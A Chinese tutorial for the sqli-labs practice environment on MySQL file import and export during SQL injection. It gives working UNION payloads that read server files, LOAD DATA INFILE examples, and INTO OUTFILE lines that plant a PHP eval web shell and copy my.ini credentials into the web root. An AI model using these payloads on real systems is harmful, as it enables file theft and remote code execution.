sqli-labs————导入导出操作

常用的导入导出函数

在做渗透测试的工程中我们少不了对一些文件进行导入导出操作，所幸的是我们有相应的函数来帮助我们完成这一系列功能。

load_file(file_name)

作用：读取文件并返回该文件的内容，作为一个字符串。

使用条件：

• 必须有权限读取并且该文件必须完全可读。
• 要进行读取的文件必须在服务器上
• 必须指定文件完整的路径
• 要进行读取的文件必须小于max_allowed_packet（最大允许包）

如果该文件不存在，或者因为上面的某一个原因不能被读出来，那么函数就会返回null。对于一个文件来说，比较难以满足的就是权限，在Windows下，如果NTFS设置得当，是不能读取相关的文件的，只有遇到administrators才能访问的文件，users就别想load_file出来。

在实际的注入中，我们有两个难点需要解决：

• 绝对的物理路径
• 构造有效的畸形语句（报错爆出绝对路径）

在很多PHP程序中，当提交一个错误的query的时候，如果display_error=on，程序就会暴露WEB目录的绝对路径，只要知道了路径，那么对于下一个可以注入的PHP程序来说，整个服务器的安全将会受到严重的威胁。

常用路径：https://blog.csdn.net/Fly_hps/article/details/80257289

使用实例：

Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

利用hex()将文件中的内容导出来，尤其是smb文件时可以使用。

-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) 

说明：“char(99,58,47,,98,111,111,116,46,105,110,105)”就是“c:\boot.ini”的ASCII代码。

-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69) 

说明：“0x633a2f626f6f742e696e69”即“C:\boot.ini”的十六进制的表示方法。

-1 union select 1,1,1,load_file(c:\\boot.ini) 

说明：路径里的“/”用“//”代替

文件导入到数据库

LOAD DATA INFILE语句用于高速地从一个文本文件中读取行，并装入一个表中。文件名称必须为一个文字字符串。

在注入过程中，我们往往需要一些特殊的文件，比如配置文件，密码文件等。当你具有数据库的权限时，可以将系统文件利用load data infile导入到数据库中。
函数具体介绍：对于参数介绍这里就不过多的赘述了，可以参考mysql的文档。

示例：

load data infile '/tmp/t0.txt' ignore into table t0 character set gbk fields terminated by '\t' lines terminated by '\n'

将/tmp/t0.txt导入到t0表中，character set gbk是字符集设置为gbk，fields terminated by是每一项数据之间的分隔符，lines terminatedby 是行的结尾符。
当错误代码是2的时候的时候，文件不存在，错误代码为13的时候是没有权限，可以考虑/tmp等文件夹。
TIPS：我们从mysql5.7的文档看到添加了load xml函数，是否依旧能够用来做注入还需要验证。

导入到文件

SELECT.....INTO OUTFILE 'file_name'

可以把被选择的行写入一个文件中。该文件被创建到服务器主机上，因此您必须拥有FILE权限，才能使用此语法。file_name不能是一个已经存在的文件。
我们一般有两种利用形式：
第一种直接将select内容导入到文件中：

Select version() into outfile"c:\\phpnow\\htdocs\\test.php"

此处将version()替换成一句话，<?php @eval($_post["mima"])?>也即

Select  <?php@eval($_post["mima"])?>  into outfile"c:\\phpnow\\htdocs\\test.php"

直接连接一句话就可以了，其实在select内容中不仅仅是可以上传一句话的，也可以上传很多的内容。

第二种修改文件结尾：

Select version() Into outfile"c:\\phpnow\\htdocs\\test.php" LINES TERMINATED BY 0x16进制文件

解释：通常是用'\r\n'结尾，此处我们修改为自己想要的任何文件。同时可以用FIELDS TERMINATED BY              

16进制可以为一句话或者其他任何的代码，可自行构造。在sqlmap中os-shell采取的就是这样的方式，

TIPS：

（1）可能在文件路径当中要注意转义，这个要看具体的环境
（2）上述我们提到了load_file(),但是当前台无法导出数据的时候，我们可以利用下面的语句：

selectload_file('c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini')into outfile'c:\\wamp\\www\\test.php'

可以利用该语句将服务器当中的内容导入到web服务器下的目录，这样就可以得到数据了。上述my.ini当中存在password项（不过默认被注释），当然会有很多的内容可以被导出来，这个要平时积累。